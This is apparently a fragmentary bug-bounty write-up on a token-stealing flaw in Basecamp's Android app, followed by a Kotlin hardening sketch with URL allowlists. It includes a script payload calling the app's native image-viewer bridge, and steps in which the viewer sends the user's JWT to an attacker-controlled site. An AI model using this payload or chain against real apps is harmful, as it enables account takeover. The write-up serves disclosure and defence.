Android security — $6,337 vulnerability in basecamp


The vulnerability

<attacker_website>

What then?

<script>NativeApp.openNativeImageViewer("[{'download_url': '', 'preview_url': 'https:/', 'caption':'ViewImage'}]", 0)</script>
  • Send a deeplink URL to the basecamp app to open
  • The app will launch and load the ‘proceed_to’ URL inside the WebViewActivity class
  • The WebViewActivity will render the proceed_to HTML (my stage 1 attack) in a special webview
  • That webview will execute ‘openNativeImageViewer’, which opens (funny enough) a native image viewer
  • That image viewer fetches a URL (again controlled by me) and adds that user’s authentication token (i.e. the JWT) in the header
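The chain above has two trust decisions the app got wrong: which proceed_to URL the WebView is allowed to load, and which image URLs the native viewer may fetch with the user's token attached. The following Kotlin is an added hardening sketch, not Basecamp's code; the host allowlist, the Bearer header format and the function names are assumptions.

```kotlin
import android.net.Uri
import org.json.JSONArray
import org.json.JSONObject

// Added example, not Basecamp's code. Assumption: these are the app's own API
// hosts; replace with the real ones.
val TRUSTED_HOSTS = setOf("3.basecamp.com")

// Only an https URL whose host is exactly an allowlisted host is trusted.
// Exact host equality (not endsWith/contains) rejects look-alikes such as
// "3.basecamp.com.attacker.example".
fun isTrustedUrl(raw: String?): Boolean {
    if (raw.isNullOrBlank()) return false
    val uri = Uri.parse(raw)
    return uri.scheme == "https" && uri.host in TRUSTED_HOSTS
}

// Deeplink step: validate proceed_to before WebViewActivity loads it.
// Returns null (load nothing) rather than falling back to the supplied URL.
fun resolveProceedTo(deeplink: Uri): String? =
    deeplink.getQueryParameter("proceed_to")?.takeIf { isTrustedUrl(it) }

// Bridge step: the openNativeImageViewer payload is page-controlled JSON, so
// drop every entry whose download_url or preview_url is off-host before the
// viewer ever sees it.
fun filterImagePayload(json: String): List<JSONObject> {
    val items = runCatching { JSONArray(json) }.getOrNull() ?: return emptyList()
    return (0 until items.length())
        .mapNotNull { items.optJSONObject(it) }
        .filter {
            isTrustedUrl(it.optString("download_url")) &&
                isTrustedUrl(it.optString("preview_url"))
        }
}

// Viewer step: attach the JWT only to requests bound for a trusted host, so a
// URL that slips past the earlier checks still cannot carry the token away.
// Assumption: the token travels as a Bearer Authorization header.
fun authHeadersFor(url: String, jwt: String): Map<String, String> =
    if (isTrustedUrl(url)) mapOf("Authorization" to "Bearer $jwt") else emptyMap()
```

Each check is independent on purpose: a bypass of the deeplink filter still leaves the payload filter, and a bypass of both still leaves the token bound to trusted hosts.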





Daniel Llewellyn